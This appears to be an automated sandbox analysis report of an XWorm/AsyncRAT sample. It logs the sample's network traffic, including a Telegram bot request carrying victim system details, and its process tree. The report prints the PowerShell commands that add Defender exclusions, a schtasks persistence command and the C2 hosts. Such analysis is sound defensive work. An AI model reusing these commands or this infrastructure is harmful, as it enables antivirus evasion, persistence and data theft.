                                                                                            Jan 7, 2025 18:04:26.091785908 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091865063 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091958046 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.091996908 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092058897 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092107058 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092228889 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092298031 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.092319012 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.174676895 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.179563999 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.296736956 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.301637888 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.368298054 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.423122883 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.428019047 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.467173100 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.472079992 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472107887 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472129107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472199917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472265005 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472311974 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472348928 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472404003 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472443104 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472500086 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472510099 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472625017 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.472634077 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.533252001 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.538094997 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.641114950 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.646059036 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.711139917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.750549078 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.755459070 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.809746027 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.814727068 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814754963 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814764023 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814785957 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814836025 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814876080 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.814944029 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815057039 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815067053 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815171003 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815180063 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815187931 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.815208912 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.859855890 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.864727974 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:26.969301939 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:26.974199057 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.078587055 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.083539963 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.105067015 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.200073957 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.205080986 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205096006 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205105066 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205121040 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205136061 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.205218077 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205298901 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205353975 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205447912 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205488920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205640078 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.205899954 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.252805948 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.313087940 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.317913055 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.422370911 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.427246094 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.444185972 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.515889883 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.541471004 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.550158978 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.555064917 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555152893 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555237055 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555257082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555273056 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555358887 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555402040 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555423021 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555438995 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555510044 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555521011 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555565119 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.555602074 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.596247911 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.672058105 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.676928997 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.781851053 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.786968946 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.835072994 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.903346062 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.908291101 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.908349991 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.908406019 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:27.908406973 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.909532070 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:27.913211107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.016253948 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.021148920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.125588894 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.130458117 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.234935999 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.239933968 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.341548920 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.347594023 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.367548943 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.435566902 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.440586090 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440617085 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440665007 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440769911 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440779924 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440817118 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440910101 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440918922 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440922976 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440953016 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.440970898 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.441034079 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.441042900 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.453815937 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.458682060 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.566313028 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.571176052 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.672375917 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.677428961 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.679954052 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.747437954 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.754403114 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754472971 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754506111 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754573107 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754606009 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754625082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.754679918 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756771088 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756802082 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756866932 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756907940 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.756927967 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.781794071 CET499827000192.168.2.794.141.122.161
                                                                                            Jan 7, 2025 18:04:28.848238945 CET70004998294.141.122.161192.168.2.7
                                                                                            Jan 7, 2025 18:04:28.891659975 CET499827000192.168.2.794.141.122.161
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 18:02:08.538686037 CET | 60797 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 18:02:08.593575001 CET | 53 | 60797 | 1.1.1.1 | 192.168.2.7
Jan 7, 2025 18:03:13.071382999 CET | 58082 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 18:03:13.078114033 CET | 53 | 58082 | 1.1.1.1 | 192.168.2.7
Jan 7, 2025 18:04:26.696494102 CET | 58304 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 18:04:26.711690903 CET | 53 | 58304 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 18:02:08.538686037 CET | 192.168.2.7 | 1.1.1.1 | 0x7935 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:03:13.071382999 CET | 192.168.2.7 | 1.1.1.1 | 0xe3e1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.696494102 CET | 192.168.2.7 | 1.1.1.1 | 0x5c87 | Standard query (0) | 122295cm.n9shteam.in | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 18:02:08.593575001 CET | 1.1.1.1 | 192.168.2.7 | 0x7935 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:03:13.078114033 CET | 1.1.1.1 | 192.168.2.7 | 0xe3e1 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:04:26.711690903 CET | 1.1.1.1 | 192.168.2.7 | 0x5c87 | No error (0) | 122295cm.n9shteam.in |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
                                                                                            • api.telegram.org
                                                                                            • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | 720 | C:\Users\user\Desktop\HaLCYOFjMN.exe

Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 18:02:08.604635954 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 7, 2025 18:02:09.077702045 CET | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 17:02:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49975 | 149.154.167.220 | 443 | 720 | C:\Users\user\Desktop\HaLCYOFjMN.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 17:03:13 UTC | 446 | OUT | GET /bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-07 17:03:14 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Tue, 07 Jan 2025 17:03:13 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-07 17:03:14 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}



                                                                                            Target ID:5
                                                                                            Start time:12:02:03
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\HaLCYOFjMN.exe"
                                                                                            Imagebase:0x200000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:12:02:07
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                                                                            Imagebase:0x150000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:12:02:07
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:12:02:14
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:12:02:14
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:13:13:58
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:13:13:58
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:13:14:17
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:13:14:17
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:13:14:41
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:13:14:41
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:13:14:42
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Imagebase:0x180000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Has exited:true

                                                                                            Target ID:23
                                                                                            Start time:13:14:53
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:24
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\rqbprm.exe"
                                                                                            Imagebase:0xc60000
                                                                                            File size:2'705'596 bytes
                                                                                            MD5 hash:693F4A6FC50DDA899DE3F006DE04951E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
